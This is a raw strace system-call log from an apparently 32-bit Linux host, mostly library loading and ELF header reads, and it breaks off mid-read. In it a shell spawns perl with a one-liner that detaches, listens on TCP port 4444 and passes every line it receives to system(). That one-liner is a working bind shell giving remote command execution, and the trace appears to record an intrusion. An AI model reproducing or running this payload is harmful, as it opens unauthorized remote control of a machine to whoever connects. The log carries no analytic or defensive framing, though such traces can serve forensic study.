\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12683 07:43:37.740555 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12683 07:43:37.740572 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dba000

12683 07:43:37.740584 mmap2(0xb7dc1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dc1000

12683 07:43:37.740600 close(1)          = 0

12683 07:43:37.740611 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.740624 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12683 07:43:37.740638 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12683 07:43:37.740722 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12683 07:43:37.740739 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da2000

12683 07:43:37.740753 mmap2(0xb7db6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7db6000

12683 07:43:37.740768 mmap2(0xb7db8000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7db8000

12683 07:43:37.740781 close(1)          = 0

12683 07:43:37.740807 munmap(0xb7f48000, 29913) = 0

12683 07:43:37.740823 open("/etc/ld.so.cache", O_RDONLY) = 1

12683 07:43:37.740846 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12683 07:43:37.740889 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f48000

12683 07:43:37.740899 close(1)          = 0

12683 07:43:37.740923 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.740938 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12683 07:43:37.740951 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12683 07:43:37.741038 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12683 07:43:37.741055 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d98000

12683 07:43:37.741066 mmap2(0xb7da0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7da0000

12683 07:43:37.741081 close(1)          = 0

12683 07:43:37.741093 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.741106 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12683 07:43:37.741120 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12683 07:43:37.741207 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12683 07:43:37.741223 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8d000

12683 07:43:37.741234 mmap2(0xb7d96000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d96000

12683 07:43:37.741249 close(1)          = 0

12683 07:43:37.741273 munmap(0xb7f48000, 29913) = 0

12683 07:43:37.741289 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12683 07:43:37.741302 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12683 07:43:37.741313 _llseek(1, 0, [0], SEEK_CUR) = 0

12683 07:43:37.741332 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12683 07:43:37.741378 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f4f000

12683 07:43:37.741389 _llseek(1, 1624, [1624], SEEK_SET) = 0

12683 07:43:37.741419 munmap(0xb7f4f000, 1624) = 0

12683 07:43:37.741428 close(1)          = 0

12683 07:43:37.741456 getpgrp()         = 3831

12683 07:43:37.741466 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12683 07:43:37.741481 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12683 07:43:37.741496 brk(0x8101000)    = 0x8101000

12683 07:43:37.741526 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12683 07:43:37.741540 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12683 07:43:37.741555 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12683 07:43:37.741594 brk(0x8102000)    = 0x8102000

12683 07:43:37.741619 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12683 07:43:37.741638 stat64("/sbin/AB", 0xbfc822d8) = -1 ENOENT (No such file or directory)

12683 07:43:37.741649 stat64("/bin/AB", 0xbfc822d8) = -1 ENOENT (No such file or directory)

12683 07:43:37.741660 stat64("/usr/sbin/AB", 0xbfc822d8) = -1 ENOENT (No such file or directory)

12683 07:43:37.741672 stat64("/usr/bin/AB", 0xbfc822d8) = -1 ENOENT (No such file or directory)

12683 07:43:37.741685 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12683 07:43:37.741699 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dc36f8) = 12684

12684 07:43:37.741741 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12684 07:43:37.741757 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12684 07:43:37.741770 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12684 07:43:37.741782 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12684 07:43:37.741796 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12684 07:43:37.741812 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12684 07:43:37.741824 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12684 07:43:37.741824 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12684 07:43:37.741824 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12684 07:43:37.741830 exit_group(127)   = ?

12683 07:43:37.748426 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:43:37.748462 waitpid(12683,  <unfinished ...>

12683 07:43:37.748487 <... rt_sigprocmask resumed> NULL, 8) = 0

12683 07:43:37.757664 --- SIGCHLD (Child exited) @ 0 (0) ---

12683 07:43:37.757664 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12684

12683 07:43:37.757664 waitpid(-1, 0xbfc81f58, WNOHANG) = -1 ECHILD (No child processes)

12683 07:43:37.757665 sigreturn()       = ? (mask now [])

12683 07:43:37.757665 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12683 07:43:37.757665 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12683 07:43:37.757665 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12683 07:43:37.757666 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12683 07:43:37.757666 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12683 07:43:37.757666 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12683 07:43:37.757697 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12683 07:43:37.757717 stat64("/sbin/perl", 0xbfc82308) = -1 ENOENT (No such file or directory)

12683 07:43:37.757729 stat64("/bin/perl", 0xbfc82308) = -1 ENOENT (No such file or directory)

12683 07:43:37.757740 stat64("/usr/sbin/perl", 0xbfc82308) = -1 ENOENT (No such file or directory)

12683 07:43:37.757751 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12683 07:43:37.757769 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12683 07:43:37.757793 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12683 07:43:37.757807 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dc36f8) = 12685

12685 07:43:37.757897 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12685 07:43:37.757915 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12685 07:43:37.757942 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12685 07:43:37.757954 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12685 07:43:37.757969 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12685 07:43:37.757984 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12685 07:43:37.757997 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12685 07:43:37.758030 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12685 07:43:37.758115 brk(0)            = 0x8153000

12685 07:43:37.758135 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.758150 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3f000

12685 07:43:37.758166 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.758183 open("/etc/ld.so.cache", O_RDONLY) = 1

12685 07:43:37.758195 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12685 07:43:37.758212 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f37000

12685 07:43:37.758222 close(1)          = 0

12685 07:43:37.758232 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.758247 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12685 07:43:37.758261 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12685 07:43:37.758361 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12685 07:43:37.758425 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f33000

12685 07:43:37.758451 mmap2(0xb7f35000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f35000

12685 07:43:37.758468 close(1)          = 0

12685 07:43:37.758479 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.758492 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12685 07:43:37.758506 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12685 07:43:37.758595 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12685 07:43:37.758612 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f0e000

12685 07:43:37.758623 mmap2(0xb7f31000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f31000

12685 07:43:37.758638 close(1)          = 0

12685 07:43:37.758649 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.758663 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12685 07:43:37.758677 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12685 07:43:37.758761 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12685 07:43:37.758777 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f0d000

12685 07:43:37.758790 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef5000

12685 07:43:37.758800 mmap2(0xb7f09000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f09000

12685 07:43:37.758814 mmap2(0xb7f0b000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f0b000

12685 07:43:37.758827 close(1)          = 0

12685 07:43:37.758839 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.758886 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12685 07:43:37.758919 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12685 07:43:37.759019 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12685 07:43:37.759040 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da6000

12685 07:43:37.759051 mmap2(0xb7eef000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eef000

12685 07:43:37.759065 mmap2(0xb7ef2000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef2000

12685 07:43:37.759078 close(1)          = 0

12685 07:43:37.759090 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12685 07:43:37.759103 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12685 07:43:37.767436 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 